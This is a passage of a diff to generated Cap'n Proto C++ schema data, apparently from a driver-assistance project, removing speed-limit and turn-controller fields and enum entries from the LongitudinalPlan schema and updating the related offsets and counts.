0, + 36, 5, 0, 0, 2, 0, 1, 0, + 20, 0, 0, 0, 6, 0, 0, 0, 0, 0, 1, 0, 23, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 197, 6, 0, 0, 178, 0, 0, 0, + 33, 5, 0, 0, 178, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 200, 6, 0, 0, 3, 0, 1, 0, - 212, 6, 0, 0, 2, 0, 1, 0, - 36, 0, 0, 0, 7, 0, 0, 0, + 36, 5, 0, 0, 3, 0, 1, 0, + 48, 5, 0, 0, 2, 0, 1, 0, + 21, 0, 0, 0, 7, 0, 0, 0, 0, 0, 1, 0, 24, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 209, 6, 0, 0, 186, 0, 0, 0, + 45, 5, 0, 0, 186, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 212, 6, 0, 0, 3, 0, 1, 0, - 224, 6, 0, 0, 2, 0, 1, 0, - 45, 0, 0, 0, 8, 0, 0, 0, + 48, 5, 0, 0, 3, 0, 1, 0, + 60, 5, 0, 0, 2, 0, 1, 0, + 30, 0, 0, 0, 8, 0, 0, 0, 0, 0, 1, 0, 25, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 221, 6, 0, 0, 154, 0, 0, 0, + 57, 5, 0, 0, 154, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 224, 6, 0, 0, 3, 0, 1, 0, - 236, 6, 0, 0, 2, 0, 1, 0, - 30, 0, 0, 0, 16, 0, 0, 0, + 60, 5, 0, 0, 3, 0, 1, 0, + 72, 5, 0, 0, 2, 0, 1, 0, + 15, 0, 0, 0, 16, 0, 0, 0, 0, 0, 1, 0, 26, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 233, 6, 0, 0, 138, 0, 0, 0, + 69, 5, 0, 0, 138, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 236, 6, 0, 0, 3, 0, 1, 0, - 248, 6, 0, 0, 2, 0, 1, 0, - 31, 0, 0, 0, 17, 0, 0, 0, + 72, 5, 0, 0, 3, 0, 1, 0, + 84, 5, 0, 0, 2, 0, 1, 0, + 16, 0, 0, 0, 17, 0, 0, 0, 0, 0, 1, 0, 27, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 245, 6, 0, 0, 138, 0, 0, 0, + 81, 5, 0, 0, 138, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 248, 6, 0, 0, 3, 0, 1, 0, - 4, 7, 0, 0, 2, 0, 1, 0, - 46, 0, 0, 0, 9, 0, 0, 0, + 84, 5, 0, 0, 3, 0, 1, 0, + 96, 5, 0, 0, 2, 0, 1, 0, + 31, 0, 0, 0, 9, 0, 0, 0, 0, 0, 1, 0, 28, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 1, 7, 0, 0, 170, 0, 0, 0, + 93, 5, 0, 0, 170, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 4, 7, 0, 0, 3, 0, 1, 0, - 16, 7, 0, 0, 2, 0, 1, 0, + 96, 5, 0, 0, 3, 0, 1, 0, + 108, 5, 0, 0, 2, 0, 1, 0, 4, 0, 0, 0, 18, 0, 0, 0, 0, 0, 1, 0, 29, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 13, 7, 0, 0, 130, 0, 0, 0, + 105, 5, 0, 0, 130, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 12, 7, 0, 0, 3, 0, 1, 0, - 24, 7, 0, 0, 2, 0, 1, 0, - 47, 0, 0, 0, 10, 0, 0, 0, + 104, 5, 0, 0, 3, 0, 1, 0, + 116, 5, 0, 0, 2, 0, 1, 0, + 32, 0, 0, 0, 10, 0, 0, 0, 0, 0, 1, 0, 30, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 21, 7, 0, 0, 194, 0, 0, 0, + 113, 5, 0, 0, 194, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 24, 7, 0, 0, 3, 0, 1, 0, - 36, 7, 0, 0, 2, 0, 1, 0, - 48, 0, 0, 0, 11, 0, 0, 0, + 116, 5, 0, 0, 3, 0, 1, 0, + 128, 5, 0, 0, 2, 0, 1, 0, + 33, 0, 0, 0, 11, 0, 0, 0, 0, 0, 1, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 33, 7, 0, 0, 162, 0, 0, 0, + 125, 5, 0, 0, 162, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 36, 7, 0, 0, 3, 0, 1, 0, - 48, 7, 0, 0, 2, 0, 1, 0, - 6, 0, 0, 0, 3, 0, 0, 0, + 128, 5, 0, 0, 3, 0, 1, 0, + 140, 5, 0, 0, 2, 0, 1, 0, + 5, 0, 0, 0, 3, 0, 0, 0, 0, 0, 1, 0, 32, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 45, 7, 0, 0, 58, 0, 0, 0, + 137, 5, 0, 0, 58, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 40, 7, 0, 0, 3, 0, 1, 0, - 68, 7, 0, 0, 2, 0, 1, 0, - 7, 0, 0, 0, 4, 0, 0, 0, + 132, 5, 0, 0, 3, 0, 1, 0, + 160, 5, 0, 0, 2, 0, 1, 0, + 6, 0, 0, 0, 4, 0, 0, 0, 0, 0, 1, 0, 33, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 65, 7, 0, 0, 58, 0, 0, 0, + 157, 5, 0, 0, 58, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 60, 7, 0, 0, 3, 0, 1, 0, - 88, 7, 0, 0, 2, 0, 1, 0, - 8, 0, 0, 0, 5, 0, 0, 0, + 152, 5, 0, 0, 3, 0, 1, 0, + 180, 5, 0, 0, 2, 0, 1, 0, + 7, 0, 0, 0, 5, 0, 0, 0, 0, 0, 1, 0, 34, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 85, 7, 0, 0, 50, 0, 0, 0, + 177, 5, 0, 0, 50, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 80, 7, 0, 0, 3, 0, 1, 0, - 108, 7, 0, 0, 2, 0, 1, 0, - 9, 0, 0, 0, 19, 0, 0, 0, + 172, 5, 0, 0, 3, 0, 1, 0, + 200, 5, 0, 0, 2, 0, 1, 0, + 8, 0, 0, 0, 19, 0, 0, 0, 0, 0, 1, 0, 35, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 105, 7, 0, 0, 162, 0, 0, 0, + 197, 5, 0, 0, 162, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 108, 7, 0, 0, 3, 0, 1, 0, - 120, 7, 0, 0, 2, 0, 1, 0, - 10, 0, 0, 0, 40, 0, 0, 0, + 200, 5, 0, 0, 3, 0, 1, 0, + 212, 5, 0, 0, 2, 0, 1, 0, + 9, 0, 0, 0, 40, 0, 0, 0, 0, 0, 1, 0, 36, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 117, 7, 0, 0, 98, 0, 0, 0, + 209, 5, 0, 0, 98, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 116, 7, 0, 0, 3, 0, 1, 0, - 128, 7, 0, 0, 2, 0, 1, 0, - 11, 0, 0, 0, 41, 0, 0, 0, - 0, 0, 1, 0, 37, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 125, 7, 0, 0, 210, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 132, 7, 0, 0, 3, 0, 1, 0, - 144, 7, 0, 0, 2, 0, 1, 0, - 12, 0, 0, 0, 21, 0, 0, 0, - 0, 0, 1, 0, 38, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 141, 7, 0, 0, 130, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 140, 7, 0, 0, 3, 0, 1, 0, - 152, 7, 0, 0, 2, 0, 1, 0, - 13, 0, 0, 0, 44, 0, 0, 0, - 0, 0, 1, 0, 39, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 149, 7, 0, 0, 186, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 152, 7, 0, 0, 3, 0, 1, 0, - 164, 7, 0, 0, 2, 0, 1, 0, - 14, 0, 0, 0, 23, 0, 0, 0, - 0, 0, 1, 0, 40, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 161, 7, 0, 0, 90, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 160, 7, 0, 0, 3, 0, 1, 0, - 172, 7, 0, 0, 2, 0, 1, 0, - 15, 0, 0, 0, 24, 0, 0, 0, - 0, 0, 1, 0, 41, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 169, 7, 0, 0, 138, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 172, 7, 0, 0, 3, 0, 1, 0, - 184, 7, 0, 0, 2, 0, 1, 0, - 16, 0, 0, 0, 25, 0, 0, 0, - 0, 0, 1, 0, 42, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 181, 7, 0, 0, 138, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 184, 7, 0, 0, 3, 0, 1, 0, - 196, 7, 0, 0, 2, 0, 1, 0, - 17, 0, 0, 0, 12, 0, 0, 0, - 0, 0, 1, 0, 43, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 193, 7, 0, 0, 130, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 192, 7, 0, 0, 3, 0, 1, 0, - 204, 7, 0, 0, 2, 0, 1, 0, - 18, 0, 0, 0, 13, 0, 0, 0, - 0, 0, 1, 0, 44, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 201, 7, 0, 0, 170, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 204, 7, 0, 0, 3, 0, 1, 0, - 216, 7, 0, 0, 2, 0, 1, 0, - 19, 0, 0, 0, 26, 0, 0, 0, - 0, 0, 1, 0, 45, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 213, 7, 0, 0, 178, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 216, 7, 0, 0, 3, 0, 1, 0, - 228, 7, 0, 0, 2, 0, 1, 0, - 20, 0, 0, 0, 27, 0, 0, 0, - 0, 0, 1, 0, 46, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 225, 7, 0, 0, 90, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 224, 7, 0, 0, 3, 0, 1, 0, - 236, 7, 0, 0, 2, 0, 1, 0, - 21, 0, 0, 0, 28, 0, 0, 0, - 0, 0, 1, 0, 47, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 233, 7, 0, 0, 82, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 232, 7, 0, 0, 3, 0, 1, 0, - 244, 7, 0, 0, 2, 0, 1, 0, - 22, 0, 0, 0, 45, 0, 0, 0, - 0, 0, 1, 0, 48, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 241, 7, 0, 0, 178, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 244, 7, 0, 0, 3, 0, 1, 0, - 0, 8, 0, 0, 2, 0, 1, 0, - 23, 0, 0, 0, 58, 0, 0, 0, - 0, 0, 1, 0, 49, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 253, 7, 0, 0, 74, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 252, 7, 0, 0, 3, 0, 1, 0, - 8, 8, 0, 0, 2, 0, 1, 0, - 24, 0, 0, 0, 14, 0, 0, 0, - 0, 0, 1, 0, 50, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 5, 8, 0, 0, 122, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 4, 8, 0, 0, 3, 0, 1, 0, - 16, 8, 0, 0, 2, 0, 1, 0, - 5, 0, 0, 0, 6, 0, 0, 0, - 0, 0, 1, 0, 51, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 13, 8, 0, 0, 82, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 12, 8, 0, 0, 3, 0, 1, 0, - 40, 8, 0, 0, 2, 0, 1, 0, + 208, 5, 0, 0, 3, 0, 1, 0, + 220, 5, 0, 0, 2, 0, 1, 0, 108, 97, 116, 101, 114, 97, 108, 86, 97, 108, 105, 100, 68, 69, 80, 82, 69, 67, 65, 84, 69, 68, 0, 0, @@ -12515,153 +12382,6 @@ static const ::capnp::_::AlignedData<927> b_e00b5b3eba12876c = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 15, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 118, 105, 115, 105, 111, 110, 84, 117, - 114, 110, 67, 111, 110, 116, 114, 111, - 108, 108, 101, 114, 83, 116, 97, 116, - 101, 0, 0, 0, 0, 0, 0, 0, - 15, 0, 0, 0, 0, 0, 0, 0, - 118, 211, 90, 145, 87, 72, 81, 225, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 15, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 118, 105, 115, 105, 111, 110, 84, 117, - 114, 110, 83, 112, 101, 101, 100, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 115, 112, 101, 101, 100, 76, 105, 109, - 105, 116, 67, 111, 110, 116, 114, 111, - 108, 83, 116, 97, 116, 101, 0, 0, - 15, 0, 0, 0, 0, 0, 0, 0, - 192, 71, 69, 96, 244, 80, 155, 219, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 15, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 115, 112, 101, 101, 100, 76, 105, 109, - 105, 116, 0, 0, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 115, 112, 101, 101, 100, 76, 105, 109, - 105, 116, 79, 102, 102, 115, 101, 116, - 0, 0, 0, 0, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 105, 115, 116, 84, 111, 83, 112, - 101, 101, 100, 76, 105, 109, 105, 116, - 0, 0, 0, 0, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 105, 115, 77, 97, 112, 83, 112, 101, - 101, 100, 76, 105, 109, 105, 116, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 115, 112, 101, 101, 100, 76, 105, 109, - 105, 116, 80, 101, 114, 99, 79, 102, - 102, 115, 101, 116, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 115, 112, 101, 101, 100, 76, 105, 109, - 105, 116, 86, 97, 108, 117, 101, 79, - 102, 102, 115, 101, 116, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 105, 115, 116, 84, 111, 84, 117, - 114, 110, 0, 0, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 116, 117, 114, 110, 83, 112, 101, 101, - 100, 0, 0, 0, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 116, 117, 114, 110, 83, 112, 101, 101, - 100, 67, 111, 110, 116, 114, 111, 108, - 83, 116, 97, 116, 101, 0, 0, 0, - 15, 0, 0, 0, 0, 0, 0, 0, - 192, 71, 69, 96, 244, 80, 155, 219, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 15, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 116, 117, 114, 110, 83, 105, 103, 110, - 0, 0, 0, 0, 0, 0, 0, 0, - 3, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 3, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 69, 50, 69, 73, 115, 66, - 108, 101, 110, 100, 101, 100, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 105, 115, 116, 97, 110, 99, 101, - 115, 0, 0, 0, 0, 0, 0, 0, - 14, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 3, 0, 1, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 14, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, } }; @@ -12672,17 +12392,15 @@ static const ::capnp::_::RawSchema* const d_e00b5b3eba12876c[] = { &s_9b1657f34caf3ad3, &s_b231a753cc079120, &s_d692e23d1a247d99, - &s_db9b50f4604547c0, - &s_e1514857915ad376, }; -static const uint16_t m_e00b5b3eba12876c[] = {17, 27, 18, 5, 4, 32, 31, 1, 22, 42, 46, 51, 50, 13, 8, 19, 12, 7, 23, 24, 43, 6, 34, 11, 0, 15, 2, 25, 9, 36, 29, 30, 10, 28, 35, 40, 39, 41, 44, 45, 33, 49, 47, 48, 16, 21, 20, 26, 3, 14, 37, 38}; -static const uint16_t i_e00b5b3eba12876c[] = {0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51}; +static const uint16_t m_e00b5b3eba12876c[] = {17, 27, 18, 5, 4, 32, 31, 1, 22, 13, 8, 19, 12, 7, 23, 24, 6, 34, 11, 0, 15, 2, 25, 9, 36, 29, 30, 10, 28, 35, 33, 16, 21, 20, 26, 3, 14}; +static const uint16_t i_e00b5b3eba12876c[] = {0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36}; const ::capnp::_::RawSchema s_e00b5b3eba12876c = { - 0xe00b5b3eba12876c, b_e00b5b3eba12876c.words, 927, d_e00b5b3eba12876c, m_e00b5b3eba12876c, - 6, 52, i_e00b5b3eba12876c, nullptr, nullptr, { &s_e00b5b3eba12876c, nullptr, nullptr, 0, 0, nullptr } + 0xe00b5b3eba12876c, b_e00b5b3eba12876c.words, 664, d_e00b5b3eba12876c, m_e00b5b3eba12876c, + 4, 37, i_e00b5b3eba12876c, nullptr, nullptr, { &s_e00b5b3eba12876c, nullptr, nullptr, 0, 0, nullptr } }; #endif // !CAPNP_LITE -static const ::capnp::_::AlignedData<54> b_b231a753cc079120 = { +static const ::capnp::_::AlignedData<41> b_b231a753cc079120 = { { 0, 0, 0, 0, 5, 0, 6, 0, 32, 145, 7, 204, 83, 167, 49, 178, 27, 0, 0, 0, 2, 0, 0, 0, @@ -12692,7 +12410,7 @@ static const ::capnp::_::AlignedData<54> b_b231a753cc079120 = { 21, 0, 0, 0, 146, 1, 0, 0, 45, 0, 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 41, 0, 0, 0, 199, 0, 0, 0, + 41, 0, 0, 0, 127, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 108, 111, 103, 46, 99, 97, 112, 110, @@ -12703,47 +12421,34 @@ static const ::capnp::_::AlignedData<54> b_b231a753cc079120 = { 108, 97, 110, 83, 111, 117, 114, 99, 101, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, - 32, 0, 0, 0, 1, 0, 2, 0, + 20, 0, 0, 0, 1, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 89, 0, 0, 0, 58, 0, 0, 0, + 53, 0, 0, 0, 58, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, - 81, 0, 0, 0, 50, 0, 0, 0, + 45, 0, 0, 0, 50, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, - 73, 0, 0, 0, 50, 0, 0, 0, + 37, 0, 0, 0, 50, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, - 65, 0, 0, 0, 50, 0, 0, 0, + 29, 0, 0, 0, 50, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, - 57, 0, 0, 0, 34, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 5, 0, 0, 0, 0, 0, 0, 0, - 49, 0, 0, 0, 42, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 6, 0, 0, 0, 0, 0, 0, 0, - 41, 0, 0, 0, 50, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 7, 0, 0, 0, 0, 0, 0, 0, - 33, 0, 0, 0, 82, 0, 0, 0, + 21, 0, 0, 0, 34, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 99, 114, 117, 105, 115, 101, 0, 0, 108, 101, 97, 100, 48, 0, 0, 0, 108, 101, 97, 100, 49, 0, 0, 0, 108, 101, 97, 100, 50, 0, 0, 0, - 101, 50, 101, 0, 0, 0, 0, 0, - 116, 117, 114, 110, 0, 0, 0, 0, - 108, 105, 109, 105, 116, 0, 0, 0, - 116, 117, 114, 110, 108, 105, 109, 105, - 116, 0, 0, 0, 0, 0, 0, 0, } + 101, 50, 101, 0, 0, 0, 0, 0, } }; ::capnp::word const* const bp_b231a753cc079120 = b_b231a753cc079120.words; #if !CAPNP_LITE -static const uint16_t m_b231a753cc079120[] = {0, 4, 1, 2, 3, 6, 5, 7}; +static const uint16_t m_b231a753cc079120[] = {0, 4, 1, 2, 3}; const ::capnp::_::RawSchema s_b231a753cc079120 = { - 0xb231a753cc079120, b_b231a753cc079120.words, 54, nullptr, m_b231a753cc079120, - 0, 8, nullptr, nullptr, nullptr, { &s_b231a753cc079120, nullptr, nullptr, 0, 0, nullptr } + 0xb231a753cc079120, b_b231a753cc079120.words, 41, nullptr, m_b231a753cc079120, + 0, 5, nullptr, nullptr, nullptr, { &s_b231a753cc079120, nullptr, nullptr, 0, 0, nullptr } }; #endif // !CAPNP_LITE CAPNP_DEFINE_ENUM(LongitudinalPlanSource_b231a753cc079120, b231a753cc079120); @@ -12816,107 +12521,6 @@ const ::capnp::_::RawSchema s_8cfeb072f5301000 = { 0, 2, i_8cfeb072f5301000, nullptr, nullptr, { &s_8cfeb072f5301000, nullptr, nullptr, 0, 0, nullptr } }; #endif // !CAPNP_LITE -static const ::capnp::_::AlignedData<40> b_db9b50f4604547c0 = { - { 0, 0, 0, 0, 5, 0, 6, 0, - 192, 71, 69, 96, 244, 80, 155, 219, - 27, 0, 0, 0, 2, 0, 0, 0, - 108, 135, 18, 186, 62, 91, 11, 224, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 21, 0, 0, 0, 146, 1, 0, 0, - 45, 0, 0, 0, 7, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 41, 0, 0, 0, 103, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 108, 111, 103, 46, 99, 97, 112, 110, - 112, 58, 76, 111, 110, 103, 105, 116, - 117, 100, 105, 110, 97, 108, 80, 108, - 97, 110, 46, 83, 112, 101, 101, 100, - 76, 105, 109, 105, 116, 67, 111, 110, - 116, 114, 111, 108, 83, 116, 97, 116, - 101, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 1, 0, 1, 0, - 16, 0, 0, 0, 1, 0, 2, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 41, 0, 0, 0, 74, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 37, 0, 0, 0, 106, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 2, 0, 0, 0, 0, 0, 0, 0, - 33, 0, 0, 0, 74, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 3, 0, 0, 0, 0, 0, 0, 0, - 29, 0, 0, 0, 58, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 105, 110, 97, 99, 116, 105, 118, 101, - 0, 0, 0, 0, 0, 0, 0, 0, - 116, 101, 109, 112, 73, 110, 97, 99, - 116, 105, 118, 101, 0, 0, 0, 0, - 97, 100, 97, 112, 116, 105, 110, 103, - 0, 0, 0, 0, 0, 0, 0, 0, - 97, 99, 116, 105, 118, 101, 0, 0, } -}; -::capnp::word const* const bp_db9b50f4604547c0 = b_db9b50f4604547c0.words; -#if !CAPNP_LITE -static const uint16_t m_db9b50f4604547c0[] = {3, 2, 0, 1}; -const ::capnp::_::RawSchema s_db9b50f4604547c0 = { - 0xdb9b50f4604547c0, b_db9b50f4604547c0.words, 40, nullptr, m_db9b50f4604547c0, - 0, 4, nullptr, nullptr, nullptr, { &s_db9b50f4604547c0, nullptr, nullptr, 0, 0, nullptr } -}; -#endif // !CAPNP_LITE -CAPNP_DEFINE_ENUM(SpeedLimitControlState_db9b50f4604547c0, db9b50f4604547c0); -static const ::capnp::_::AlignedData<39> b_e1514857915ad376 = { - { 0, 0, 0, 0, 5, 0, 6, 0, - 118, 211, 90, 145, 87, 72, 81, 225, - 27, 0, 0, 0, 2, 0, 0, 0, - 108, 135, 18, 186, 62, 91, 11, 224, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 21, 0, 0, 0, 170, 